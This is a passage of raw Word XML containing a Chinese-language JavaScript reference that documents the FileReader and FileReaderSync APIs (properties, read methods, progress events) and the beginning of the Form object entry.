        <w:t>读取已完成，成功或带有错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly FileError error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果读取中出现错误，这个属性将指代描述该错误的</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short readyState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性描述</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>的当前状态。它的值可能为上面列</w:t>
      </w:r>
      <w:r>
        <w:t>出的</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个常量之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly any result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果读取成功完成，这个属性将以字符串或</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>的形式（取决于调用了哪个读取方法）保存对应的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>内容。如果</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>LOADING</w:t>
      </w:r>
      <w:r>
        <w:t>或者触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这个属性可能包含对应的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的部分内容。如果没有调用读取方法或者发生了错误，这个属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>null</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void abort()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法中止一个读取任务。它将</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>DONE</w:t>
      </w:r>
      <w:r>
        <w:t>，将</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，将</w:t>
      </w:r>
      <w:r>
        <w:t>erro</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>设置为一个</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>FileError.ABORT_ERR</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。然后，它将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件和一个</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void readAsArrayBuffer(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容，结果为一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象，可通过</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void readAsBinaryString(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容，将它们编码为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>二进制字符串，并将结果赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>二进制</w:t>
      </w:r>
      <w:r>
        <w:t>字符串中的每一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的字符编码都在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>之间。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>String.charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>来提取这些字节值。注意，二进制字符串是二进制数据的一种低效的表示形式：如果可能应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffers</w:t>
      </w:r>
      <w:r>
        <w:t>代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void readAsDataURL(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节，将它们（以及该</w:t>
      </w:r>
      <w:r>
        <w:t>Blog</w:t>
      </w:r>
      <w:r>
        <w:t>的类型）编码为</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</w:t>
      </w:r>
      <w:r>
        <w:t>，并将</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为返回的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void readAsText(Blob blob,[string encoding])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容，并使用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:t>将它解码为一个</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>文本字符串，然后将</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为解码后的字符串。如未指定</w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:t>，将默认使用</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>（如果</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>编码的文本以一个字节顺序标记（</w:t>
      </w:r>
      <w:r>
        <w:t>Byte Order Mark</w:t>
      </w:r>
      <w:r>
        <w:t>）开始的话也会自动检测并解码它）。</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和所有异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>类似，</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>是基于事件的。可以使用这儿列出的处理程序属性来注册事件处理程序，或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>实现的</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>事件在</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象自身上触发。它们不冒泡，也没有可取消的默认行为。</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序总是传入</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象。一次成功的读取任务以一个</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件开始，接着是零个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件、一个</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件，以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。不成功的读取任务以一个</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件开始，接着是零个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件、一个</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件，以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onabort</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当读取任务通过</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中止时触</w:t>
      </w:r>
      <w:r>
        <w:t>发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>发生某种错误时触发。</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代一个有错误代码的</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blog</w:t>
      </w:r>
      <w:r>
        <w:t>成功读取时触发。</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，形式取决于调用的是哪个读取方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onloadend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>的读取方法最后都会产生一个</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件、一个</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件或一个</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件。在这些事件之后</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>也会触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这样有些脚本就可以只监听一个事件而不是所有</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onloadstart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在调用一个</w:t>
      </w:r>
      <w:r>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:t>方法之后但是在读取数据之前触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当正在读取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>数据时触发，大约每秒</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>次。</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象指出已经读取了多少字节，</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能包含这些字节的表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="824" w:name="FileReaderSync"/>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:bookmarkEnd w:id="824"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同步读取一个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader API</w:t>
      </w:r>
      <w:r>
        <w:t>的一个同步版本，仅在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中可用。同步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>比异步的更好用：只需要简单地创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileRe</w:t>
      </w:r>
      <w:r>
        <w:t>aderSync()</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后调用它的一个读取方法，该方法将返回对应</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的内容或者抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</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FileReaderSync()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderSync()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>对象，后者不需要参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果读取失败，无论因为什么原因，这些方法都将抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ArrayBuffer readAsArrayBuffer(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容并以</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>的形式返</w:t>
      </w:r>
      <w:r>
        <w:t>回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string readAsBinaryString(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容，并编码为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>二进制字符串（参见</w:t>
      </w:r>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
      <w:r>
        <w:t>），然后返回这个二进制字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string readAsDataURL(Blob blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容并将内容与</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性编码为一个</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</w:t>
      </w:r>
      <w:r>
        <w:t>，返回这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string readAsText(Blob blob,[string encoding])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的字节内容并使用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:t>（如果没有指定编码则使用</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>）解码为文本，并返回这个文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="825" w:name="Form"/>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:bookmarkEnd w:id="825"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞表单</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lastRenderedPageBreak/>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。它的</w:t>
      </w:r>
      <w:r>
        <w:t>elements</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>，提供了访问表单的所有元素的一个方便方法。</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:t>方法允许表单在程序的控制下提交或者重置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
